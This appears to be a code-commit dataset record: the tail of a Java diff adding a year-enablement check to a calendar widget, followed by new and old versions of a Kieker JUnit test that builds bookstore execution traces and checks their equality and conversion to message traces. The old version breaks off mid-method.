<ide> fireEvent(new MonthChangeEvent(this, selectedMonth));
<ide> }
<ide> } else if (calendarResolution.equals(CalendarResolution.YEAR)) {
<del> // FIXME : isYearEnabled
<del> setYearMonthDisplayed(new YearMonth(relativeDateIndex, getYearMonthDisplayed().getMonthOfYear()));
<del> setCalendarResolution(CalendarResolution.MONTH);
<add> if(isYearEnabled(relativeDateIndex)) {
<add> setYearMonthDisplayed(new YearMonth(relativeDateIndex, getYearMonthDisplayed().getMonthOfYear()));
<add> setCalendarResolution(CalendarResolution.MONTH);
<add> }
<ide> }
<ide> }
<ide>
<ide> }
<ide>
<ide> /**
<del> * Returns true if month is enabled. Default implementations returns monthCustomizer value if any.
<add> * Returns true if month is enabled. Default implementations returns {@link CellItemCustomizer} value if any.
<ide> *
<ide> * @param yearMonth
<add> * the month
<ide> * @return true if month is enabled.
<ide> */
<ide> protected boolean isMonthEnabled(YearMonth yearMonth) {
<ide> if (cellItemCustomizer != null) {
<ide> return cellItemCustomizer.isEnabled(yearMonth, this);
<add> }
<add> return true;
<add> }
<add>
<add> /**
<add> * Returns true if year is enabled. Default implementations returns {@link CellItemCustomizer} value if any.
<add> *
<add> * @param year
<add> * the year
<add> * @return true if year is enabled.
<add> */
<add> protected boolean isYearEnabled(int year) {
<add> if (cellItemCustomizer != null) {
<add> return cellItemCustomizer.isEnabled(year, this);
<ide> }
<ide> return true;
<ide> }
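A minimal sketch of how the year-enablement hook added in this commit could be exercised from application code. It is illustrative only and not part of the dataset row: the class name RecentYearsCustomizer is hypothetical, the package path of CellItemCustomizerAdapter is assumed from the add-on's package, and the int-year isEnabled overload on the adapter is assumed from the cellItemCustomizer.isEnabled(year, this) call visible in the diff above.

import org.vaadin.addons.tuningdatefield.CellItemCustomizerAdapter;
import org.vaadin.addons.tuningdatefield.TuningDateField;

// Hypothetical customizer: limits the YEAR-resolution calendar to 2000-2020 by
// returning false for any other year. The new isYearEnabled(int) method delegates
// to this customizer via cellItemCustomizer.isEnabled(year, this).
public class RecentYearsCustomizer extends CellItemCustomizerAdapter {

    @Override
    public boolean isEnabled(int year, TuningDateField calendar) {
        // Assumption: the adapter declares this int-year overload, mirroring the
        // isEnabled(year, this) call introduced in the diff.
        return year >= 2000 && year <= 2020;
    }
}

It would be wired up the same way as the day and month customizers shown in the class javadoc, e.g. tuningDateField.setCellItemCustomizer(new RecentYearsCustomizer());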
Java
apache-2.0
c58d3b8967d5b86ca510de50114c8eb9c76dcde0
0
kieker-monitoring/kieker,HaStr/kieker,kieker-monitoring/kieker,leadwire-apm/leadwire-javaagent,HaStr/kieker,leadwire-apm/leadwire-javaagent,kieker-monitoring/kieker,HaStr/kieker,kieker-monitoring/kieker,HaStr/kieker,HaStr/kieker,kieker-monitoring/kieker
/*************************************************************************** * Copyright 2011 by * + Christian-Albrechts-University of Kiel * + Department of Computer Science * + Software Engineering Group * and others. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. ***************************************************************************/ package kieker.test.tools.junit.traceAnalysis.systemModel; import java.util.List; import java.util.SortedSet; import java.util.TreeSet; import junit.framework.Assert; import junit.framework.TestCase; import kieker.common.configuration.Configuration; import kieker.common.logging.Log; import kieker.common.logging.LogFactory; import kieker.test.tools.junit.traceAnalysis.util.ExecutionFactory; import kieker.tools.traceAnalysis.filter.traceReconstruction.InvalidTraceException; import kieker.tools.traceAnalysis.systemModel.AbstractMessage; import kieker.tools.traceAnalysis.systemModel.AllocationComponent; import kieker.tools.traceAnalysis.systemModel.Execution; import kieker.tools.traceAnalysis.systemModel.ExecutionTrace; import kieker.tools.traceAnalysis.systemModel.MessageTrace; import kieker.tools.traceAnalysis.systemModel.Operation; import kieker.tools.traceAnalysis.systemModel.SynchronousCallMessage; import kieker.tools.traceAnalysis.systemModel.SynchronousReplyMessage; import kieker.tools.traceAnalysis.systemModel.repository.SystemModelRepository; import org.junit.Before; import org.junit.Test; /** * * @author Andre van Hoorn */ public class TestExecutionTraceBookstore extends TestCase { private static final Log LOG = LogFactory.getLog(TestExecutionTraceBookstore.class); private static final long TRACE_ID = 69898L; private static final String SESSION_ID = "iXsnm70o4N"; private volatile ExecutionFactory eFactory; private volatile long minTin; private volatile long maxTout; private volatile int numExecutions; /* Executions of a valid trace */ private volatile Execution exec0_0__bookstore_searchBook; // NOCS // NOPMD (VariableNamingConventions) private volatile Execution exec1_1__catalog_getBook; // NOCS // NOPMD (VariableNamingConventions) private volatile Execution exec2_1__crm_getOrders; // NOCS // NOPMD (VariableNamingConventions) private volatile Execution exec3_2__catalog_getBook; // NOCS // NOPMD (VariableNamingConventions) // public TestExecutionTraceBookstore() { // // } @Override @Before protected void setUp() throws Exception { final SystemModelRepository systemEntityFactory = new SystemModelRepository(new Configuration()); this.eFactory = new ExecutionFactory(systemEntityFactory); int numExecutions_l = 0; /* Manually create Executions for a trace */ numExecutions_l++; this.exec0_0__bookstore_searchBook = this.eFactory.genExecution("Bookstore", "bookstore", "searchBook", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 1, 10, 0, 0); this.minTin = this.exec0_0__bookstore_searchBook.getTin(); this.maxTout = this.exec0_0__bookstore_searchBook.getTout(); numExecutions_l++; this.exec1_1__catalog_getBook = 
this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, // NOPMD TestExecutionTraceBookstore.SESSION_ID, 2, 4, 1, 1); numExecutions_l++; this.exec2_1__crm_getOrders = this.eFactory.genExecution("CRM", "crm", "getOrders", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 5, 8, 2, 1); numExecutions_l++; this.exec3_2__catalog_getBook = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 6, 7, 3, 2); // Just some basic checks to make sure that the trace has been set up properly (we've had some trouble here) Assert.assertNotSame(this.exec3_2__catalog_getBook.getOperation(), this.exec2_1__crm_getOrders.getOperation()); Assert.assertNotSame(this.exec0_0__bookstore_searchBook.getAllocationComponent(), this.exec1_1__catalog_getBook.getAllocationComponent()); this.numExecutions = numExecutions_l; } private ExecutionTrace genValidBookstoreTrace() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = new ExecutionTrace(TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID); executionTrace.add(this.exec3_2__catalog_getBook); executionTrace.add(this.exec2_1__crm_getOrders); executionTrace.add(this.exec0_0__bookstore_searchBook); executionTrace.add(this.exec1_1__catalog_getBook); return executionTrace; } /** * Tests whether the "well-known" Bookstore trace gets correctly * represented as an Execution Trace. * * @throws InvalidTraceException */ @Test public void testValidExecutionTrace() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); /* Perform some validity checks on the execution trace object */ Assert.assertEquals("Invalid length of Execution Trace", executionTrace.getLength(), this.numExecutions); Assert.assertEquals("Invalid maximum stack depth", executionTrace.getMaxEss(), 2); Assert.assertEquals("Invalid minimum tin timestamp", executionTrace.getMinTin(), this.minTin); Assert.assertEquals("Invalid maximum tout timestamp", executionTrace.getMaxTout(), this.maxTout); } /** * Tests the equals method of the ExecutionTrace class with two equal * traces. * * @throws InvalidTraceException */ @Test public void testEqualMethodEqualTraces() throws InvalidTraceException { final ExecutionTrace execTrace1 = this.genValidBookstoreTrace(); final ExecutionTrace execTrace2 = this.genValidBookstoreTrace(); Assert.assertEquals(execTrace1, execTrace2); } /** * Tests the equals method of the ExecutionTrace class with two different * traces. * * @throws InvalidTraceException */ @Test public void testEqualMethodDifferentTraces() throws InvalidTraceException { final ExecutionTrace execTrace1 = this.genValidBookstoreTrace(); final ExecutionTrace execTrace2 = this.genBrokenBookstoreTraceEoiSkip(); Assert.assertFalse(execTrace1.equals(execTrace2)); } private enum VariationPoint { OPERATION, ALLOCATION, TRACE_ID, SESSION_ID, EOI, ESS, TIN, TOUT }; /** * Returns an {@link Execution} with each field being equal to that of <i>executionTemplate</i> except for the value * of the given {@link VariationPoint} being set to the respective value of <i>variationTemplate</i>. 
* * @param executionTemplate * @param vPoint * @param variationTemplate * @return */ private Execution cloneExecutionWithVariation(final Execution executionTemplate, final VariationPoint vPoint, final Execution variationTemplate) { Operation op = executionTemplate.getOperation(); AllocationComponent allocComp = executionTemplate.getAllocationComponent(); long traceId = executionTemplate.getTraceId(); String sessionId = executionTemplate.getSessionId(); int eoi = executionTemplate.getEoi(); int ess = executionTemplate.getEss(); long tin = executionTemplate.getTin(); long tout = executionTemplate.getTout(); final boolean assumed = executionTemplate.isAssumed(); /* Now perform the selected variation */ switch (vPoint) { case ALLOCATION: allocComp = variationTemplate.getAllocationComponent(); break; case EOI: eoi = variationTemplate.getEoi(); break; case ESS: ess = variationTemplate.getEss(); break; case OPERATION: op = variationTemplate.getOperation(); break; case SESSION_ID: sessionId = variationTemplate.getSessionId(); break; case TIN: tin = variationTemplate.getTin(); break; case TOUT: tout = variationTemplate.getTout(); break; case TRACE_ID: traceId = variationTemplate.getTraceId(); break; default: Assert.fail(); } final Execution retVal = new Execution(op, allocComp, traceId, sessionId, eoi, ess, tin, tout, assumed); Assert.assertFalse("executions must vary in " + vPoint + " but are equal: " + executionTemplate + " ; " + retVal, retVal.equals(executionTemplate)); return retVal; } @Test public void testExecutionTraceEqualMethod() throws InvalidTraceException { final ExecutionTrace trace0 = this.genValidBookstoreTrace(); /** * Will be used to create a clone of exec0_0__bookstore_searchBook with certain variations * selected from the execution. */ final Execution variationTemplate = new Execution(this.exec1_1__catalog_getBook.getOperation(), this.exec1_1__catalog_getBook.getAllocationComponent(), this.exec1_1__catalog_getBook.getTraceId() + 100, this.exec1_1__catalog_getBook.getSessionId() + "_", this.exec1_1__catalog_getBook.getEoi() + 100, this.exec1_1__catalog_getBook.getEss() + 100, this.exec1_1__catalog_getBook.getTin() + 100, this.exec1_1__catalog_getBook.getTout(), !this.exec1_1__catalog_getBook.isAssumed()); vLoop: for (final VariationPoint vPoint : VariationPoint.values()) { final ExecutionTrace trace1 = new ExecutionTrace(trace0.getTraceId(), trace0.getSessionId()); for (final Execution execFromTrace0 : trace0.getTraceAsSortedExecutionSet()) { final Execution execToAddToTrace1; if (execFromTrace0 == this.exec0_0__bookstore_searchBook) { execToAddToTrace1 = this.cloneExecutionWithVariation(this.exec0_0__bookstore_searchBook, vPoint, variationTemplate); // This tests the Execution's equals method already Assert.assertFalse("Executions must not be equal (variation point: " + vPoint + " ) but they are: " + execFromTrace0 + "; " + execToAddToTrace1, execFromTrace0.equals(execToAddToTrace1)); if (vPoint == VariationPoint.TRACE_ID) { // We won't be able to continue for this variation because we cannot add an execution // with a varying trace id. However, at least we've tested the Execution's equal method. 
continue vLoop; } } else { execToAddToTrace1 = execFromTrace0; } trace1.add(execToAddToTrace1); } Assert.assertFalse("Execution traces must not be equal (variation point: " + vPoint + " ) but they are: " + trace0 + "; " + trace1, trace0.equals(trace1)); } } /** * This method can be used to debug the {@link java.util.Comparator} provided by {@link ExecutionTrace#createExecutionTraceComparator()}. */ @Test public void testTreeSet() { final SortedSet<Execution> s0 = new TreeSet<Execution>(ExecutionTrace.createExecutionTraceComparator()); final SortedSet<Execution> s1 = new TreeSet<Execution>(ExecutionTrace.createExecutionTraceComparator()); final Execution execFromTrace0 = this.exec0_0__bookstore_searchBook; final Execution long1 = new Execution(execFromTrace0.getOperation(), execFromTrace0.getAllocationComponent(), execFromTrace0.getTraceId(), execFromTrace0.getSessionId(), execFromTrace0.getEoi(), execFromTrace0.getEss(), execFromTrace0.getTin(), execFromTrace0.getTout(), execFromTrace0.isAssumed()); s0.add(execFromTrace0); s1.add(long1); Assert.assertEquals("Expected sets to be equal", s0, s1); } /** * Tests whether the "well-known" Bookstore trace can be correctly transformed * from an Execution Trace representation into a Message Trace representation. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationValidTrace() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); /* * Transform Execution Trace to Message Trace representation */ final MessageTrace messageTrace = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); /* * Validate Message Trace representation. */ Assert.assertEquals("Invalid traceId", messageTrace.getTraceId(), TestExecutionTraceBookstore.TRACE_ID); final List<AbstractMessage> msgVector = messageTrace.getSequenceAsVector(); Assert.assertEquals("Invalid number of messages in trace", msgVector.size(), this.numExecutions * 2); final AbstractMessage[] msgArray = msgVector.toArray(new AbstractMessage[msgVector.size()]); Assert.assertEquals(msgArray.length, this.numExecutions * 2); int curIdx = 0; { /* 1.: [0,0].Call $->bookstore.searchBook(..) */// NOCS final AbstractMessage call0_0___root__bookstore_searchBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call0_0___root__bookstore_searchBook instanceof SynchronousCallMessage); // NOPMD (String repeat) Assert.assertEquals("Sending execution is not root execution", call0_0___root__bookstore_searchBook.getSendingExecution(), SystemModelRepository.ROOT_EXECUTION); Assert.assertEquals(call0_0___root__bookstore_searchBook.getReceivingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals("Message has wrong timestamp", call0_0___root__bookstore_searchBook.getTimestamp(), this.exec0_0__bookstore_searchBook.getTin()); // NOPMD } { /* 2.: [1,1].Call bookstore.searchBook(..)->catalog.getBook(..) 
*/// NOCS final AbstractMessage call1_1___bookstore_searchBook_catalog_getBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call1_1___bookstore_searchBook_catalog_getBook instanceof SynchronousCallMessage); Assert.assertEquals(call1_1___bookstore_searchBook_catalog_getBook.getSendingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals(call1_1___bookstore_searchBook_catalog_getBook.getReceivingExecution(), this.exec1_1__catalog_getBook); Assert.assertEquals("Message has wrong timestamp", call1_1___bookstore_searchBook_catalog_getBook.getTimestamp(), this.exec1_1__catalog_getBook.getTin()); } { /* 2.: [1,1].Return catalog.getBook(..)->bookstore.searchBook(..) */// NOCS final AbstractMessage return1_1___catalog_getBook__bookstore_searchBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a reply", return1_1___catalog_getBook__bookstore_searchBook instanceof SynchronousReplyMessage); Assert.assertEquals(return1_1___catalog_getBook__bookstore_searchBook.getSendingExecution(), this.exec1_1__catalog_getBook); Assert.assertEquals(return1_1___catalog_getBook__bookstore_searchBook.getReceivingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals("Message has wrong timestamp", return1_1___catalog_getBook__bookstore_searchBook.getTimestamp(), this.exec1_1__catalog_getBook.getTout()); } { /* 3.: [2,1].Call bookstore.searchBook(..)->crm.getOrders(..) */// NOCS final AbstractMessage call2_1___bookstore_searchBook__crm_getOrders = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call2_1___bookstore_searchBook__crm_getOrders instanceof SynchronousCallMessage); Assert.assertEquals(call2_1___bookstore_searchBook__crm_getOrders.getSendingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals(call2_1___bookstore_searchBook__crm_getOrders.getReceivingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals("Message has wrong timestamp", call2_1___bookstore_searchBook__crm_getOrders.getTimestamp(), this.exec2_1__crm_getOrders.getTin()); } { /* 4.: [3,2].Call crm.getOrders(..)->catalog.getBook(..) */// NOCS final AbstractMessage call3_2___bookstore_searchBook__catalog_getBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call3_2___bookstore_searchBook__catalog_getBook instanceof SynchronousCallMessage); Assert.assertEquals(call3_2___bookstore_searchBook__catalog_getBook.getSendingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals(call3_2___bookstore_searchBook__catalog_getBook.getReceivingExecution(), this.exec3_2__catalog_getBook); Assert.assertEquals("Message has wrong timestamp", call3_2___bookstore_searchBook__catalog_getBook.getTimestamp(), this.exec3_2__catalog_getBook.getTin()); } { /* 5.: [3,2].Return catalog.getBook(..)->crm.getOrders(..) 
*/// NOCS final AbstractMessage return3_2___catalog_getBook__crm_getOrders = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a reply", return3_2___catalog_getBook__crm_getOrders instanceof SynchronousReplyMessage); Assert.assertEquals(return3_2___catalog_getBook__crm_getOrders.getSendingExecution(), this.exec3_2__catalog_getBook); Assert.assertEquals(return3_2___catalog_getBook__crm_getOrders.getReceivingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals("Message has wrong timestamp", return3_2___catalog_getBook__crm_getOrders.getTimestamp(), this.exec3_2__catalog_getBook.getTout()); } { /* 6.: [2,1].Return crm.getOrders(..)->bookstore.searchBook */// NOCS final AbstractMessage return2_1___crm_getOrders__bookstore_searchBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a reply", return2_1___crm_getOrders__bookstore_searchBook instanceof SynchronousReplyMessage); Assert.assertEquals(return2_1___crm_getOrders__bookstore_searchBook.getSendingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals(return2_1___crm_getOrders__bookstore_searchBook.getReceivingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals("Message has wrong timestamp", return2_1___crm_getOrders__bookstore_searchBook.getTimestamp(), this.exec2_1__crm_getOrders.getTout()); } } /** * Make sure that the transformation from an Execution Trace to a Message * Trace is performed only once. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationOnlyOnce() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); /* * Transform Execution Trace to Message Trace representation (twice) * and make sure, that the instances are the same. */ final MessageTrace messageTrace1 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); final MessageTrace messageTrace2 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.assertSame(messageTrace1, messageTrace2); } /** * Make sure that the transformation from an Execution Trace to a Message * Trace is performed only once. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationTwiceOnChange() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); final Execution exec4_1__catalog_getBook = this.eFactory // NOCS .genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 9, 10, 4, 1); final MessageTrace messageTrace1 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); executionTrace.add(exec4_1__catalog_getBook); final MessageTrace messageTrace2 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.assertNotSame(messageTrace1, messageTrace2); } /** * Creates a broken execution trace version of the "well-known" Bookstore * trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [1,1] are replaced by the eoi/ess values [1,3]. Since ess values must only * increment/decrement by 1, this test must lead to an exception. 
* * @return * @throws InvalidTraceException */ private ExecutionTrace genBrokenBookstoreTraceEssSkip() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = new ExecutionTrace(TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID); final Execution exec1_1__catalog_getBook__broken = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, // NOCS TestExecutionTraceBookstore.SESSION_ID, 2, 4, 1, 3); // NOCS Assert.assertFalse("Invalid test", exec1_1__catalog_getBook__broken.equals(this.exec1_1__catalog_getBook)); executionTrace.add(this.exec3_2__catalog_getBook); executionTrace.add(this.exec2_1__crm_getOrders); executionTrace.add(this.exec0_0__bookstore_searchBook); executionTrace.add(exec1_1__catalog_getBook__broken); return executionTrace; } /** * Assert that the transformation of a broken execution trace version of the * "well-known" Bookstore trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [1,1] are replaced by the eoi/ess values [1,3]. Since ess values must only * increment/decrement by 1, this test must lead to an exception. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationBrokenTraceEssSkip() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genBrokenBookstoreTraceEssSkip(); /** * Transform Execution Trace to Message Trace representation */ try { /* The following call must throw an Exception in this test case */ TestExecutionTraceBookstore.LOG.info("This test triggers a FATAL warning about an ess skip <0,3> which can simply be ignored because it is desired"); executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.fail("An invalid execution has been transformed to a message trace"); } catch (final InvalidTraceException ex) { // NOPMD /* we wanted this exception to happen */ } } /** * Creates a broken execution trace version of the "well-known" Bookstore * trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [3,2] are replaced by the eoi/ess values [4,2]. Since eoi values must only * increment by 1, this test must lead to an exception. * * @return * @throws InvalidTraceException */ private ExecutionTrace genBrokenBookstoreTraceEoiSkip() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = new ExecutionTrace(TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID); final Execution exec3_2__catalog_getBook__broken = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, // NOCS TestExecutionTraceBookstore.SESSION_ID, 6, 7, 4, 2); Assert.assertFalse("Invalid test", exec3_2__catalog_getBook__broken.equals(this.exec3_2__catalog_getBook)); executionTrace.add(exec3_2__catalog_getBook__broken); executionTrace.add(this.exec2_1__crm_getOrders); executionTrace.add(this.exec0_0__bookstore_searchBook); executionTrace.add(this.exec1_1__catalog_getBook); return executionTrace; } /** * Assert that the transformation of a broken execution trace version of the * "well-known" Bookstore trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [3,2] are replaced by the eoi/ess values [4,2]. 
Since eoi values must only * increment by 1, this test must lead to an exception. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationBrokenTraceEoiSkip() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = this.genBrokenBookstoreTraceEoiSkip(); /** * Transform Execution Trace to Message Trace representation */ try { /* The following call must throw an Exception in this test case */ executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.fail("An invalid execution has been transformed to a message trace"); } catch (final InvalidTraceException ex) { // NOPMD /* we wanted this exception to happen */ } } }
test/tools/kieker/test/tools/junit/traceAnalysis/systemModel/TestExecutionTraceBookstore.java
/*************************************************************************** * Copyright 2011 by * + Christian-Albrechts-University of Kiel * + Department of Computer Science * + Software Engineering Group * and others. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. ***************************************************************************/ package kieker.test.tools.junit.traceAnalysis.systemModel; import java.util.List; import java.util.SortedSet; import java.util.TreeSet; import junit.framework.Assert; import junit.framework.TestCase; import kieker.common.configuration.Configuration; import kieker.common.logging.Log; import kieker.common.logging.LogFactory; import kieker.test.tools.junit.traceAnalysis.util.ExecutionFactory; import kieker.tools.traceAnalysis.filter.traceReconstruction.InvalidTraceException; import kieker.tools.traceAnalysis.systemModel.AbstractMessage; import kieker.tools.traceAnalysis.systemModel.AllocationComponent; import kieker.tools.traceAnalysis.systemModel.Execution; import kieker.tools.traceAnalysis.systemModel.ExecutionTrace; import kieker.tools.traceAnalysis.systemModel.MessageTrace; import kieker.tools.traceAnalysis.systemModel.Operation; import kieker.tools.traceAnalysis.systemModel.SynchronousCallMessage; import kieker.tools.traceAnalysis.systemModel.SynchronousReplyMessage; import kieker.tools.traceAnalysis.systemModel.repository.SystemModelRepository; import org.junit.Before; import org.junit.Test; /** * * @author Andre van Hoorn */ public class TestExecutionTraceBookstore extends TestCase { private static final Log LOG = LogFactory.getLog(TestExecutionTraceBookstore.class); private static final long TRACE_ID = 69898L; private static final String SESSION_ID = "iXsnm70o4N"; private volatile ExecutionFactory eFactory; private volatile long minTin; private volatile long maxTout; private volatile int numExecutions; /* Executions of a valid trace */ private volatile Execution exec0_0__bookstore_searchBook; // NOCS // NOMPD (VariableNamingConventions) private volatile Execution exec1_1__catalog_getBook; // NOCS // NOMPD (VariableNamingConventions) private volatile Execution exec2_1__crm_getOrders; // NOCS // NOMPD (VariableNamingConventions) private volatile Execution exec3_2__catalog_getBook; // NOCS // NOMPD (VariableNamingConventions) // public TestExecutionTraceBookstore() { // // } @Override @Before protected void setUp() throws Exception { final SystemModelRepository systemEntityFactory = new SystemModelRepository(new Configuration()); this.eFactory = new ExecutionFactory(systemEntityFactory); int numExecutions_l = 0; /* Manually create Executions for a trace */ numExecutions_l++; this.exec0_0__bookstore_searchBook = this.eFactory.genExecution("Bookstore", "bookstore", "searchBook", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 1, 10, 0, 0); this.minTin = this.exec0_0__bookstore_searchBook.getTin(); this.maxTout = this.exec0_0__bookstore_searchBook.getTout(); numExecutions_l++; this.exec1_1__catalog_getBook = 
this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, // NOPMD TestExecutionTraceBookstore.SESSION_ID, 2, 4, 1, 1); numExecutions_l++; this.exec2_1__crm_getOrders = this.eFactory.genExecution("CRM", "crm", "getOrders", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 5, 8, 2, 1); numExecutions_l++; this.exec3_2__catalog_getBook = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 6, 7, 3, 2); // Just some basic checks to make sure that the trace has been set up properly (we've had some trouble here) Assert.assertNotSame(this.exec3_2__catalog_getBook.getOperation(), this.exec2_1__crm_getOrders.getOperation()); Assert.assertNotSame(this.exec0_0__bookstore_searchBook.getAllocationComponent(), this.exec1_1__catalog_getBook.getAllocationComponent()); this.numExecutions = numExecutions_l; } private ExecutionTrace genValidBookstoreTrace() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = new ExecutionTrace(TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID); executionTrace.add(this.exec3_2__catalog_getBook); executionTrace.add(this.exec2_1__crm_getOrders); executionTrace.add(this.exec0_0__bookstore_searchBook); executionTrace.add(this.exec1_1__catalog_getBook); return executionTrace; } /** * Tests whether the "well-known" Bookstore trace gets correctly * represented as an Execution Trace. * * @throws InvalidTraceException */ @Test public void testValidExecutionTrace() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); /* Perform some validity checks on the execution trace object */ Assert.assertEquals("Invalid length of Execution Trace", executionTrace.getLength(), this.numExecutions); Assert.assertEquals("Invalid maximum stack depth", executionTrace.getMaxEss(), 2); Assert.assertEquals("Invalid minimum tin timestamp", executionTrace.getMinTin(), this.minTin); Assert.assertEquals("Invalid maximum tout timestamp", executionTrace.getMaxTout(), this.maxTout); } /** * Tests the equals method of the ExecutionTrace class with two equal * traces. * * @throws InvalidTraceException */ @Test public void testEqualMethodEqualTraces() throws InvalidTraceException { final ExecutionTrace execTrace1 = this.genValidBookstoreTrace(); final ExecutionTrace execTrace2 = this.genValidBookstoreTrace(); Assert.assertEquals(execTrace1, execTrace2); } /** * Tests the equals method of the ExecutionTrace class with two different * traces. * * @throws InvalidTraceException */ @Test public void testEqualMethodDifferentTraces() throws InvalidTraceException { final ExecutionTrace execTrace1 = this.genValidBookstoreTrace(); final ExecutionTrace execTrace2 = this.genBrokenBookstoreTraceEoiSkip(); Assert.assertFalse(execTrace1.equals(execTrace2)); } private enum VariationPoint { OPERATION, ALLOCATION, TRACE_ID, SESSION_ID, EOI, ESS, TIN, TOUT }; /** * Returns an {@link Execution} with each field being equal to that of <i>executionTemplate</i> except for the value * of the given {@link VariationPoint} being set to the respective value of <i>variationTemplate</i>. 
* * @param executionTemplate * @param vPoint * @param variationTemplate * @return */ private Execution cloneExecutionWithVariation(final Execution executionTemplate, final VariationPoint vPoint, final Execution variationTemplate) { Operation op = executionTemplate.getOperation(); AllocationComponent allocComp = executionTemplate.getAllocationComponent(); long traceId = executionTemplate.getTraceId(); String sessionId = executionTemplate.getSessionId(); int eoi = executionTemplate.getEoi(); int ess = executionTemplate.getEss(); long tin = executionTemplate.getTin(); long tout = executionTemplate.getTout(); final boolean assumed = executionTemplate.isAssumed(); /* Now perform the selected variation */ switch (vPoint) { case ALLOCATION: allocComp = variationTemplate.getAllocationComponent(); break; case EOI: eoi = variationTemplate.getEoi(); break; case ESS: ess = variationTemplate.getEss(); break; case OPERATION: op = variationTemplate.getOperation(); break; case SESSION_ID: sessionId = variationTemplate.getSessionId(); break; case TIN: tin = variationTemplate.getTin(); break; case TOUT: tout = variationTemplate.getTout(); break; case TRACE_ID: traceId = variationTemplate.getTraceId(); break; default: Assert.fail(); } final Execution retVal = new Execution(op, allocComp, traceId, sessionId, eoi, ess, tin, tout, assumed); Assert.assertFalse("executions must vary in " + vPoint + " but are equal: " + executionTemplate + " ; " + retVal, retVal.equals(executionTemplate)); return retVal; } @Test public void testExecutionTraceEqualMethod() throws InvalidTraceException { final ExecutionTrace trace0 = 